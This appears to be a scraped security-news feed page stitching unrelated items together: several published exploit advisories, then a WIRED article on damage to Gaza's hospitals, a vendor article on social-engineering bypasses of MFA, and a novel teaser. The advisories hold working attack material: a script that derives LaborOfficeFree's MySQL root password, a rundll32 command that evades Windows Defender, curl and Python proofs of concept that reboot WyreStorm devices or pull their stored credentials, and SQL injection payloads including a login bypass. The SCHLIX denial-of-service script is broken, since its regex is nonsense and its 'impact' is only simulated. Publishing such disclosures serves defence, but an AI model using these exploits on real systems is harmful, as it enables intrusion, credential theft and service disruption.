LaborOfficeFree installs a MySQL instance that runs as SYSTEM and calculates the MySQL root password based on two constants. Each time the program needs to connect to MySQL as root, it employs the reverse algorithm to calculate the root password. This issue has been tested on version 19.10 exclusively, but allegedly, versions prior to 19.10 are also vulnerable.

    # Exploit Title: LaborOfficeFree 19.10 MySQL Root Password Calculator - CVE-2024-1346# Google Dork: N/A# Date: 09/02/2023# Exploit Author: Peter Gabaldon - https://pgj11.com/# Vendor Homepage: https://www.laborofficefree.com/# Software Link: https://www.laborofficefree.com/#plans# Version: 19.10# Tested on: Windows 10# CVE : CVE-2024-1346# Description: LaborOfficeFree installs a MySQL instance that runs as SYSTEM and calculates the MySQL root password based on two constants. Each time the program needs to connect to MySQL as root, it employs the reverse algorithm to calculate the root password. This issue has been tested on version 19.10 exclusively, but allegedly, versions prior to 19.10 are also vulnerable."""  After installing LaborOfficeFree in testing lab and revesing the backup process, it is possible to determine that it creates a "mysqldump.exe" process with the root user and the password being derived from the string "hola" concated with "00331-20471-98465-AA370" (in this case). This appears to be the license, but it is different from the license shown in the GUI dashboard. This license has to be extracted from memory. From example, attaching a debugger and breaking in the mysqldump process (for that, admin rights are NOT needed).    Also, the app checks if you are an admin to perform the backup and fails if the program is not running as adminsitrator. But, this check is not effective, as it is actually calling mysqldump with a derived password. Thus, administrator right are not needed.     Here is the disassembly piece of the procedure in LaborOfficeFree.exe responsible of calculating the root password.    00506548 | 53                       | push ebx                                | Aqui se hacen el XOR y demas que calcula la pwd :)    00506549 | 56                       | push esi                                |    0050654A | A3 7CFD8800              | mov dword ptr ds:[88FD7C],eax           | eax:"hola00331-20471-98465-AA370"    0050654F | 0FB7C2                   | movzx eax,dx                            | eax:"hola00331-20471-98465-AA370"    00506552 | 85C0                     | test eax,eax                            | eax:"hola00331-20471-98465-AA370"    00506554 | 7E 2E                    | jle laborofficefree.506584              |    00506556 | BA 01000000              | mov edx,1                               |    0050655B | 8B1D 7CFD8800            | mov ebx,dword ptr ds:[88FD7C]           |    00506561 | 0FB65C13 FF              | movzx ebx,byte ptr ds:[ebx+edx-1]       |    00506566 | 8B31                     | mov esi,dword ptr ds:[ecx]              |    00506568 | 81E6 FF000000            | and esi,FF                              |    0050656E | 33DE                     | xor ebx,esi                             |    00506570 | 8B1C9D A40B8800          | mov ebx,dword ptr ds:[ebx*4+880BA4]     |    00506577 | 8B31                     | mov esi,dword ptr ds:[ecx]              |    00506579 | C1EE 08                  | shr esi,8                               |    0050657C | 33DE                     | xor ebx,esi                             |    0050657E | 8919                     | mov dword ptr ds:[ecx],ebx              |    00506580 | 42                       | inc edx                                 |    00506581 | 48                       | dec eax                                 | eax:"hola00331-20471-98465-AA370"    00506582 | 75 D7                    | jne laborofficefree.50655B              |    00506584 | 5E                       | pop esi                                 |    00506585 | 5B                       | pop ebx                                 |    00506586 | C3                       | ret                                     |     The result number from this procedure is then negated (bitwise NOT) and casted as a signed integer. Note: the address 0x880BA4 stores a constant array of 256 DWORDs entries.    005065C8 | F755 F8                  | not dword ptr ss:[ebp-8]                |  Running this script produces the root password of the LaborOfficeFree MySQL.    C:\Users\***\Desktop>python myLaborRootPwdCalculator.py    1591779762        C:\Users\***\Desktop>"""#! /usr/bin/python3from operator import xorimport ctypesif __name__ == "__main__":  magic_str = "hola00331-20471-98465-AA370"  mask = 0x000000ff  const = [0x0,0x77073096,0x0EE0E612C,0x990951BA,0x76DC419,0x706AF48F,0x0E963A535,0x9E6495A3,0x0EDB8832,0x79DCB8A4,0x0E0D5E91E,0x97D2D988,0x9B64C2B,0x7EB17CBD,0x0E7B82D07,0x90BF1D91,0x1DB71064,0x6AB020F2,0x0F3B97148,0x84BE41DE,0x1ADAD47D,0x6DDDE4EB,0x0F4D4B551,0x83D385C7,0x136C9856,0x646BA8C0,0x0FD62F97A,0x8A65C9EC,0x14015C4F,0x63066CD9,0x0FA0F3D63,0x8D080DF5,0x3B6E20C8,0x4C69105E,0x0D56041E4,0x0A2677172,0x3C03E4D1,0x4B04D447,0x0D20D85FD,0x0A50AB56B,0x35B5A8FA,0x42B2986C,0x0DBBBC9D6,0x0ACBCF940,0x32D86CE3,0x45DF5C75,0x0DCD60DCF,0x0ABD13D59,0x26D930AC,0x51DE003A,0x0C8D75180,0x0BFD06116,0x21B4F4B5,0x56B3C423,0x0CFBA9599,0x0B8BDA50F,0x2802B89E,0x5F058808,0x0C60CD9B2,0x0B10BE924,0x2F6F7C87,0x58684C11,0x0C1611DAB,0x0B6662D3D,0x76DC4190,0x1DB7106,0x98D220BC,0x0EFD5102A,0x71B18589,0x6B6B51F,0x9FBFE4A5,0x0E8B8D433,0x7807C9A2,0x0F00F934,0x9609A88E,0x0E10E9818,0x7F6A0DBB,0x86D3D2D,0x91646C97,0x0E6635C01,0x6B6B51F4,0x1C6C6162,0x856530D8,0x0F262004E,0x6C0695ED,0x1B01A57B,0x8208F4C1,0x0F50FC457,0x65B0D9C6,0x12B7E950,0x8BBEB8EA,0x0FCB9887C,0x62DD1DDF,0x15DA2D49,0x8CD37CF3,0x0FBD44C65,0x4DB26158,0x3AB551CE,0x0A3BC0074,0x0D4BB30E2,0x4ADFA541,0x3DD895D7,0x0A4D1C46D,0x0D3D6F4FB,0x4369E96A,0x346ED9FC,0x0AD678846,0x0DA60B8D0,0x44042D73,0x33031DE5,0x0AA0A4C5F,0x0DD0D7CC9,0x5005713C,0x270241AA,0x0BE0B1010,0x0C90C2086,0x5768B525,0x206F85B3,0x0B966D409,0x0CE61E49F,0x5EDEF90E,0x29D9C998,0x0B0D09822,0x0C7D7A8B4,0x59B33D17,0x2EB40D81,0x0B7BD5C3B,0x0C0BA6CAD,0x0EDB88320,0x9ABFB3B6,0x3B6E20C,0x74B1D29A,0x0EAD54739,0x9DD277AF,0x4DB2615,0x73DC1683,0x0E3630B12,0x94643B84,0x0D6D6A3E,0x7A6A5AA8,0x0E40ECF0B,0x9309FF9D,0x0A00AE27,0x7D079EB1,0x0F00F9344,0x8708A3D2,0x1E01F268,0x6906C2FE,0x0F762575D,0x806567CB,0x196C3671,0x6E6B06E7,0x0FED41B76,0x89D32BE0,0x10DA7A5A,0x67DD4ACC,0x0F9B9DF6F,0x8EBEEFF9,0x17B7BE43,0x60B08ED5,0x0D6D6A3E8,0x0A1D1937E,0x38D8C2C4,0x4FDFF252,0x0D1BB67F1,0x0A6BC5767,0x3FB506DD,0x48B2364B,0x0D80D2BDA,0x0AF0A1B4C,0x36034AF6,0x41047A60,0x0DF60EFC3,0x0A867DF55,0x316E8EEF,0x4669BE79,0x0CB61B38C,0x0BC66831A,0x256FD2A0,0x5268E236,0x0CC0C7795,0x0BB0B4703,0x220216B9,0x5505262F,0x0C5BA3BBE,0x0B2BD0B28,0x2BB45A92,0x5CB36A04,0x0C2D7FFA7,0x0B5D0CF31,0x2CD99E8B,0x5BDEAE1D,0x9B64C2B0,0x0EC63F226,0x756AA39C,0x26D930A,0x9C0906A9,0x0EB0E363F,0x72076785,0x5005713,0x95BF4A82,0x0E2B87A14,0x7BB12BAE,0x0CB61B38,0x92D28E9B,0x0E5D5BE0D,0x7CDCEFB7,0x0BDBDF21,0x86D3D2D4,0x0F1D4E242,0x68DDB3F8,0x1FDA836E,0x81BE16CD,0x0F6B9265B,0x6FB077E1,0x18B74777,0x88085AE6,0x0FF0F6A70,0x66063BCA,0x11010B5C,0x8F659EFF,0x0F862AE69,0x616BFFD3,0x166CCF45,0x0A00AE278,0x0D70DD2EE,0x4E048354,0x3903B3C2,0x0A7672661,0x0D06016F7,0x4969474D,0x3E6E77DB,0x0AED16A4A,0x0D9D65ADC,0x40DF0B66,0x37D83BF0,0x0A9BCAE53,0x0DEBB9EC5,0x47B2CF7F,0x30B5FFE9,0x0BDBDF21C,0x0CABAC28A,0x53B39330,0x24B4A3A6,0x0BAD03605,0x0CDD70693,0x54DE5729,0x23D967BF,0x0B3667A2E,0x0C4614AB8,0x5D681B02,0x2A6F2B94,0x0B40BBE37,0x0C30C8EA1,0x5A05DF1B,0x2D02EF8D]  result = 0xffffffff  for c in magic_str:    aux = result & mask    aux2 = xor(ord(c), aux)    aux3 = xor(const[aux2], (result >> 8))    result = aux3  result = ~result  result = ctypes.c_long(result).value  print(result)

LaborOfficeFree 19.10 MySQL Root Password Calculator 

This is additional research regarding a mitigation bypass in Windows Defender. Back in 2022, the researcher disclosed how it could be easily bypassed by passing an extra path traversal when referencing mshtml but that issue has since been mitigated. However, the researcher discovered using multiple commas can also be used to achieve the bypass.

    [+] Credits: John Page (aka hyp3rlinx)    [+] Website: hyp3rlinx.altervista.org[+] Source:  https://hyp3rlinx.altervista.org/advisories/MICROSOFT_WINDOWS_DEFENDER_TROJAN.WIN32.POWESSERE.G_MITIGATION_BYPASS_PART2.txt[+] twitter.com/hyp3rlinx[+] ISR: ApparitionSec      [Vendor]www.microsoft.com[Product]Windows Defender[Vulnerability Type]Windows Defender Detection Mitigation BypassTrojanWin32Powessere.G[CVE Reference]N/A[Security Issue]Trojan.Win32/Powessere.G / Mitigation Bypass Part 2.Typically, Windows Defender detects and prevents TrojanWin32Powessere.G aka "POWERLIKS" type execution that leverages rundll32.exe. Attempts at execution failand attackers will typically get an "Access is denied" error message.Back in 2022, I disclosed how that could be easily bypassed by passing an extra path traversal when referencing mshtml but since has been mitigated.However, I discovered using multi-commas "," will bypass that mitigation and successfully execute as of the time of this writing.[References]https://hyp3rlinx.altervista.org/advisories/MICROSOFT_WINDOWS_DEFENDER_DETECTION_BYPASS.txt[Exploit/POC]Open command prompt as Administrator.C:\sec>rundll32.exe javascript:"\..\..\mshtml,RunHTMLApplication ";alert(666)Access is denied.C:\sec>rundll32.exe javascript:"\..\..\mshtml,,RunHTMLApplication ";alert(666)Multi-commas, for the Win![Network Access]Local[Severity]High[Disclosure Timeline]February 7, 2024: Public Disclosure[+] DisclaimerThe information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, andthat due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due creditis given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibilityfor any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related informationor exploits by the author or elsewhere. All content (c).hyp3rlinx

Windows Defender Detection Mitigation Bypass

An issue was discovered on WyreStorm Apollo VX20 versions prior to 1.3.58. Remote attackers can restart the device via a /device/reboot HTTP GET request.

    [+] Credits: John Page (aka hyp3rlinx)    [+] Website: hyp3rlinx.altervista.org[+] Source:  http://hyp3rlinx.altervista.org/advisories/WYRESTORM_APOLLO_VX20_INCORRECT_ACCESS_CONTROL_DOS_CVE-2024-25736.txt[+] twitter.com/hyp3rlinx[+] ISR: ApparitionSec     [Vendor]www.wyrestorm.com[Product]APOLLO VX20 < 1.3.58[Vulnerability Type]Incorrect Access Control (DOS)[Affected Product Code Base]APOLLO VX20 < 1.3.58, fixed in v1.3.58[Affected Component]Web interface, reboot and reset commands[CVE Reference]CVE-2024-25736[Security Issue]An issue was discovered on WyreStorm Apollo VX20 devices before 1.3.58. Remote attackers can restart the device via a /device/reboot HTTP GET request.[Exploit/POC]curl -k https://192.168.x.x/device/reboot[Network Access]Remote[Severity]High[Disclosure Timeline]Vendor Notification: January 18, 2024Vendor released fixed firmware v1.3.58: February 2, 2024February 11, 2024 : Public Disclosure[+] DisclaimerThe information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, andthat due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due creditis given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibilityfor any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related informationor exploits by the author or elsewhere. All content (c).hyp3rlinx

WyreStorm Apollo VX20 Incorrect Access Control

WyreStorm Apollo VX20 versions prior to 1.3.58 suffer from a cleartext credential disclosure vulnerability when accessing /device/config with an HTTP GET.

    [+] Credits: John Page (aka hyp3rlinx)    [+] Website: hyp3rlinx.altervista.org[+] Source:  http://hyp3rlinx.altervista.org/advisories/WYRESTORM_APOLLO_VX20_INCORRECT_ACCESS_CONTROL_CREDENTIALS_DISCLOSURE_CVE-2024-25735.txt[+] twitter.com/hyp3rlinx[+] ISR: ApparitionSec     [Vendor]www.wyrestorm.com[Product]APOLLO VX20 < 1.3.58[Vulnerability Type]Incorrect Access Control (Credentials Disclosure)[Affected Component]Web interface, config[Affected Product Code Base] APOLLO VX20 < 1.3.58, fixed in v1.3.58[CVE Reference]CVE-2024-25735[Security Issue]An issue was discovered on WyreStorm Apollo VX20 devices before 1.3.58.Remote attackers can discover cleartext credentials for the SoftAP (access point) Router /device/config using an HTTP GET request.The credentials are then returned in the HTTP response. curl -k https://192.168.x.x/device/configE.g. HTTP response snippet::{"enable":"y","oncmd":"8004","offcmd":"8036"}},"screen":"dual","ipconflict":"y","wifi":{"auto":"y","band":"5","channel":"153"},"softAp":{"password":"12345678","router":"y","softAp":"y"}...[Exploit/POC]import requeststarget="https://x.x.x.x"res = requests.get(target+"/device/config", verify=False)idx=res.content.find('{"password":')if idx != -1:    idx2=res.content.find('router')    if idx2 != -1:        print("[+] CVE-2024-25735 Credentials Disclosure")        print("[+] " + res.content[idx + 1:idx2 + 11])        print("[+] hyp3rlinx")else:    print("[!] Apollo vX20 Device not vulnerable...")[Network Access]Remote[Severity]High[Disclosure Timeline]Vendor Notification: January 18, 2024Vendor released fixed firmware v1.3.58: February 2, 2024February 11, 2024 : Public Disclosure[+] DisclaimerThe information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, andthat due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due creditis given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibilityfor any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related informationor exploits by the author or elsewhere. All content (c).hyp3rlinx

WyreStorm Apollo VX20 Credential Disclosure

An issue was discovered on WyreStorm Apollo VX20 devices prior to version 1.3.58. The TELNET service prompts for a password only after a valid username is entered. Attackers who can reach the Apollo VX20 Telnet service can determine valid accounts allowing for account discovery.

    [+] Credits: John Page (aka hyp3rlinx)    [+] Website: hyp3rlinx.altervista.org[+] Source:  http://hyp3rlinx.altervista.org/advisories/WYRESTORM_APOLLO_VX20_ACCOUNT_ENUMERATION_CVE-2024-25734.txt[+] twitter.com/hyp3rlinx[+] ISR: ApparitionSec      [Vendor]www.wyrestorm.com[Product]APOLLO VX20 < 1.3.58[Vulnerability Type]Account Enumeration[CVE Reference]CVE-2024-25734[Security Issue]An issue was discovered on WyreStorm Apollo VX20 devices before 1.3.58. The TELNET service prompts for a password only after a valid username is entered.Attackers who can reach the Apollo VX20 Telnet service can determine valid accounts, this can potentially allow for brute force attack on a valid account.[Exploit/POC]TELNET x.x.x.x 23username:aausername:bbusername:adminpassword:[Network Access]Remote [Affected Product Code Base] APOLLO VX20 - < 1.3.58, fixed in v1.3.58[Severity]Medium[Disclosure Timeline]Vendor Notification: January 18, 2024Vendor released fixed firmware v1.3.58: February 2, 2024February 11, 2024 : Public Disclosure[+] DisclaimerThe information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, andthat due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due creditis given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibilityfor any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related informationor exploits by the author or elsewhere. All content (c).hyp3rlinx

WyreStorm Apollo VX20 Account Enumeration

Complaint Management System version 2.0 suffers from multiple remote SQL injection vulnerabilities.

    # Exploit Title: Complaint-Management-System Multiple SQL Injection Vulnerabilities# Date: 02/09/2-24# Exploit Author: Diyar Saadi# Vendor Homepage: https://phpgurukul.com/complaint-management-sytem/# Software Link: https://phpgurukul.com/?sdm_process_download=1&download_id=7259# Version: V 2.0# Tested on: Windows 11 + XAMPP 8.0.301- SQL Injection## Description ##Multiple SQL injection vulnerabilities have been identified in the Complaint Management System V 2.0. These vulnerabilities allow an attacker to manipulate SQL queries through user-controlled input, potentially leading to unauthorized access or data disclosure , The vulnerable code is in the `complaint-details.php ` file within the `admin` directory. The `cid` parameter .# Proof Of Ceoncept ##--> During forward the payload the response time is expand at least 5 second .--> Payload: 1' AND SLEEP(5) --Request :httpGET /admin/complaint-details.php?cid=1%27%20AND%20SLEEP(5)%20-- HTTP/1.1Host: localhostCookie: PHPSESSID=h08ab7d2umqg507c1392g0opmpSec-Ch-Ua: "Chromium";v="121", "Not A(Brand";v="99"Sec-Ch-Ua-Mobile: ?0Sec-Ch-Ua-Platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.85 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Priority: u=0, iConnection: close# SQL Injection Vulnerability in User Authentications ### Proof Of Concept ##--> Attackers can bypass admin panel by forward the payload .--> Payload : admin'or'1-- from username field and any letter like pwn from password field then click sign in .--> Enjoy :xRequest :POST /admin/index.php HTTP/1.1Host: localhostCookie: PHPSESSID=h08ab7d2umqg507c1392g0opmpContent-Length: 46Cache-Control: max-age=0Sec-Ch-Ua: "Chromium";v="121", "Not A(Brand";v="99"Sec-Ch-Ua-Mobile: ?0Sec-Ch-Ua-Platform: "Windows"Upgrade-Insecure-Requests: 1Origin: https://localhostContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.85 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: https://localhost/admin/index.phpAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Priority: u=0, iConnection: closeusername=admin%27or%271--&password=pwn&submit=Greetz!Sent with [Proton Mail](https://proton.me/) secure email.

Complaint Management System 2.0 SQL Injection

SCHLIX version 2.2.8-1 suffers from a REGEX processing denial of service vulnerability.

# Exploit Title: SCHLIX v2.2.8-1 Regular Expression Denial of Service  
# Date: 02/10/2024  
# Exploit Author: Diyar Saadi  
# Vendor Homepage: https://www.schlix.com  
# Software Link: https://www.schlix.com/html/schlix-cms-downloads.html  
# Version: v2.2.8-1  
# Tested on: Windows 11 + XAMPP

## Description ##

SCHLIX v2.2.8-1 is vulnerable to regular expression denial of service . (ReDoS) is an algorithmic complexity attack that produces a denial-of-service by providing a regular expression and/or an input that takes a long time to evaluate…

## Proof Of Concept ##

import requests  
import re  
import time

def test_redos(url, payload):  
try:  
vulnerable_regex = r'(.*a){x} for x > 10'

match = re.match(vulnerable_regex, payload)

if match:  
print("Vulnerability not triggered.")  
else:  
print("Vulnerability may be present. Simulating 30-second impact...")

for _ in range(6):  
time.sleep(5)  
print("Simulating impact...")

print("Simulated impact duration completed.")

except re.error:  
print("Error in regex pattern.")

try:  
response = requests.get(url)  
if response.status_code == 200:  
print("Service is up.")  
else:  
print("Service may be down or inaccessible.")  
except requests.RequestException as e:  
print(f"HTTP Request Error: {str(e)}")

if __name__ == "__main__":  
target_url = 'http://localhost'

payload = "aaaaaaaaaaaaaaaaaaaaaaaaa!"

test_redos(target_url, payload)

Sent with [Proton Mail](https://proton.me/) secure email.

SCHLIX 2.2.8-1 Denial Of Service

New research finds that Israel’s attacks on Gaza damaged hospitals and other medical facilities at the same rate as other buildings, potentially in violation of international law.

The world has witnessed a near-unprecedented and ongoing humanitarian crisis in Gaza during the first 129 days of the Israel-Hamas war. Despite their critical role in saving lives, hospitals and other health care facilities—which are protected under international law—have not been spared the widespread destruction in the Palestinian territory, according to new research.

A study published Monday in the _British Medical Journal Global Health_ from researchers at the Yale School of Public Health found that from October 7—the day Hamas launched an unexpected attack on Israel that left some 1,200 Israelis dead—to November 7, 2023, hospitals and health care facilities were damaged at the same rate as other buildings. The paper’s authors suggest that the Israel Defense Forces (IDF) did not take measures to ensure it did not strike these facilities, despite their protected status.

“This pattern of war, at least in this first month, looks like it was not really aligned with international humanitarian law,” says Danielle Poole, an associate research scientist at the Yale School of Public Health and lead author on the paper.

The United Nations Relief and Works Agency for Palestine Refugees in the Near East estimates that at the start of 2024, 85 percent of Gaza’s population, or some 1.9 million people, had been displaced by the conflict, and the Gaza Ministry of Health reports that at least 28,064 Palestinians were killed between October 7, 2023, and February 10, 2024. Human Rights Watch, a nonprofit watchdog organization, has characterized Israel’s attacks on health care facilities in Gaza as “apparently unlawful.”

Using high-resolution satellite imagery from the United Nations, data from the open source mapping platform OpenStreetMap, and known locations of medical facilities listed by the World Health Organization (WHO) and the United Nations Office for Coordination of Humanitarian Assistance, the researchers were able to identify damage to over 167,000 buildings during the first month of the conflict. Poole and her team found that 15,768 nonmedical structures and nine health care–related facilities suffered damage—about 9 percent in each case. The analysis also found that health care facilities were more likely than other buildings to have sustained severe damage or to have been destroyed completely.

“Already in this first month, their health system was severely compromised due to the conflict,” says Poole. As the researchers note in their report, the attacks on medical facilities “will undoubtedly have long-term effects on the health system through the severely decreased ability to provide necessary medical care to the population.”

Researchers ranked the damage done to buildings in four ascending categories: “possible damage,” “moderate damage,” “severe damage,” and “destroyed.” Poole says the numbers noted in her team’s report are conservative because they don’t count smaller medical facilities, like pharmacies or small clinics. “You wouldn't expect an artillery officer to know about the little pharmacy in the strip mall, even though those things are still protected” under international humanitarian law, she says.

IDF flares light up the sky above the Al-Shifa hospital on November, 6, 2023.Photograph: Ahmad Salem/Bloomberg/Getty Images

International humanitarian law prohibits attacks on hospitals and health care facilities, or against patients, doctors, and their means of transport, during a conflict. A health care facility can lose its protected status if it is used to “commit acts that are harmful to the enemy,” according to the International Committee of the Red Cross (ICRC).

“Hospitals have special protection status underneath the Geneva Conventions and the Law of Armed Conflict,” says Nathaniel Raymond, a human rights investigator and a coauthor of the study. “To intentionally strike a hospital, the protocol required is the most restrictive for any type of civilian infrastructure. An armed party to a conflict must ensure that the hospital is notified that it has lost protected status, and efforts are made to ensure the evacuation of those facilities prior to any kinetic strike. That is what the law requires.”

In a lengthy response to WIRED’s questions about what measures it has taken to prevent damage to health care facilities, the IDF defended its military operations. “A central feature of Hamas’ strategy is the exploitation of civilian structures for terror purposes,” says an IDF spokesperson. “It is against this context of widespread exploitation of medical facilities and intelligence indicating their knowledge and even participation in terror activities that Israel has apprehended and questioned individuals in Gaza, including medical staff. We reiterate that individuals found not to have been involved in terrorist activity are released after questioning.”

The IDF has alleged that Hamas was operating out of tunnels underneath Al-Shifa, the largest hospital in Gaza, thereby making it a legitimate target. IDF forces raided the hospital on November 15. The tunnels have not been proven to have had a military function, and the legality of that IDF military operation remains in dispute.

Even in cases where the military has leveraged civilian structures, combatants are expected to exercise what IHL dubs “proportionality” and “precaution,” meaning that any attack should be done such that civilian harms do not outweigh the military benefit. “This does not mean there’s free license to attack,” ICRC chief legal officer Cordula Droege said in an ICRC video posted November 2 on X. “The party to the conflict has to do everything feasible in order to avoid or at least minimize harm to patients and medical staff.”

Although the destruction of health care facilities in Gaza is far more extensive, the WHO also recorded “33 attacks on health care in Israel during the violent events of October 7.” The WHO cautioned Hamas and Israel to remember “their obligation under international humanitarian law to respect the sanctity of, and actively protect, health facilities.” An independent UN Human Rights Council commission also says it is “collecting and preserving evidence of war crimes committed by all sides since 7 October 2023.”

The implications for Gaza’s health system have been disastrous. Even in the earliest weeks of the conflict, doctors warned that hospitals were running out of space to treat the wounded and were operating without access to anesthetics or even clean water. Hospitals and the health care system have also seen continued destruction. On January 3, the WHO estimated that only 13 of the 36 hospitals in Gaza remained operational. The WHO also says that instances of disease in Gaza have skyrocketed as access to health care, food, and clean water has plummeted.

Poole says she hopes the research leads to further investigations to “ascertain whether or not the medical complexes were getting distinction, proportionality, and precaution principles that protects them through IHL” throughout the course of the conflict.

“If the principle of distinction was being respected in this conflict, there would be a stark difference in our findings between special protected infrastructure—in this case, health facilities—and non-health facility infrastructure,” Raymond says. “What we find instead is that there is no difference.”

_Update: 2/12/2024, 8:40 am ET to clarify the description of the satellite material on which the researchers based their analysis._

Satellite Images Point to Indiscriminate Israeli Attacks on Gaza’s Health Care Facilities

When it comes to access security, one recommendation stands out above the rest: multi-factor authentication (MFA). With passwords alone being simple work for hackers, MFA provides an essential layer of protection against breaches. However, it's important to remember that MFA isn't foolproof. It can be bypassed, and it often is. 
If a password is compromised, there are several options

When it comes to access security, one recommendation stands out above the rest: multi-factor authentication (MFA). With passwords alone being simple work for hackers, MFA provides an essential layer of protection against breaches. However, it's important to remember that MFA isn't foolproof. It can be bypassed, and it often is.

If a password is compromised, there are several options available to hackers looking to circumvent the added protection of MFA. We'll explore four social engineering tactics hackers successfully use to breach MFA and emphasize the importance of having a strong password as part of a layered defense.

**1\. Adversary-in-the-middle (AITM) attacks**

AITM attacks involve deceiving users into believing they're logging into a genuine network, application, or website. But really, they're giving up their information to a fraudulent lookalike. This lets hackers intercept passwords and manipulate security measures, including MFA prompts. For instance, a spear-phishing email may arrive in an employee's inbox, posing as a trusted source. Clicking on the embedded link directs them to a counterfeit website where hackers collect their login credentials.

While MFA should ideally prevent these attacks by requiring an additional authentication factor, hackers can employ a technique known as '2FA pass-on.' Once the victim enters their credentials on the fake site, the attacker promptly enters the same details on the legitimate site. This triggers a legitimate MFA request, which the victim anticipates and readily approves, unwittingly granting the attacker complete access.

This is a common tactic for threat groups such as _Storm-1167_, who are known for crafting fake Microsoft authentication pages to harvest credentials. They also create a second phishing page that mimics the MFA step of the Microsoft login process, prompting the victim to put in their MFA code and grant the attackers access. From there, they gain access to a legitimate email account and can use it as a platform for a multi-stage phishing attack.

**2\. MFA prompt bombing**

This tactic takes advantage of the push notification feature in modern authentication apps. After compromising a password, attackers attempt to login which sends an MFA prompt to the legitimate user's device. They rely on the user either mistaking it for a genuine prompt and accepting it or becoming frustrated with continuous prompts and accepting one to stop the notifications. This technique, known as MFA prompt bombing, poses a significant threat.

In a notable incident, hackers from the _0ktapus_ group compromised an Uber contractor's login credentials through SMS phishing, then continued with the authentication process from a machine they controlled and immediately requested a multi-factor authentication (MFA) code. They then impersonated an Uber security team member on Slack, convincing the contractor to accept the MFA push notification on their phone.

**3\. Service desk attacks**

Attackers deceive helpdesks into bypassing MFA by feigning password forgetfulness and gaining access through phone calls. If service desk agents fail to enforce proper verification procedures, they may unknowingly grant hackers an initial entry point into their organization's environment. A recent example was the MGM Resorts attack, where the _Scattered Spider_ hacker group fraudulently contacted the service desk for a password reset, giving them a foothold to log in and launch a ransomware attack.

Hackers also try to exploit recovery settings and back-up procedures by manipulating service desks to circumvent MFA. _0ktapus_ have been known to resort to targeting an organization's service desk if their MFA prompt bombing proves unsuccessful. They'll contact service desks claiming their phone is inoperable or lost, then request to enroll in a new, attacker-controlled MFA authentication device. They can then exploit the organization's recovery or backup process by getting a password reset link sent to the compromised device. Concerned about service desk security gaps? Learn how to secure yours.

**4\. SIM swapping**

Cybercriminals understand MFA often relies on cell phones as a means of authentication. They can exploit this with a technique called a 'SIM swap', where hackers deceive service providers into transferring a target's services to a SIM card under their control. They can then effectively take over the target's cell service and phone number, letting them intercept MFA prompts and gain unauthorized access to accounts.

After an incident in 2022, Microsoft published a report detailing the tactics employed by the threat group _LAPSUS$_. The report explained how _LAPSUS$_ dedicates extensive social engineering campaigns to gaining initial footholds in target organizations. One of their favored techniques is targeting users with SIM-swapping attacks, along with MFA prompt bombing, and resetting a target's credentials through help desk social engineering.

**You can't fully rely on MFA – password security still matters**

This wasn't an exclusive list of ways to bypass MFA. There are several others ways too, including compromising endpoints, exporting generated tokens, exploiting SSO, and finding unpatched technical deficiencies. It's clear that setting up MFA doesn't mean organizations can forget about securing passwords altogether.

Account compromise still often starts with weak or compromised passwords. Once an attacker obtains a valid password, they can then shift their focus towards bypassing the MFA mechanism. Even a strong password can't protect users if it's been compromised through a breach or password reuse. And for most organizations, going fully passwordless won't be a practical option.

With a tool like Specops Password Policy, you can enforce robust Active Directory password policies to eliminate weak passwords and continuously scan for compromised passwords resulting from breaches, password reuse, or being sold after a phishing attack. This ensures that MFA serves as an additional layer of security as intended, rather than being solely relied upon as a silver-bullet solution. If you're interested in exploring how Specops Password Policy can fit with your organization's specific needs, please contact us.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

4 Ways Hackers use Social Engineering to Bypass MFA

“This eruption of violence had been brewing for years, through successive economic collapses, pandemics, and the utter dysfunction that had become American life.” An exclusive excerpt from 2054: A Novel.

Tag

#auth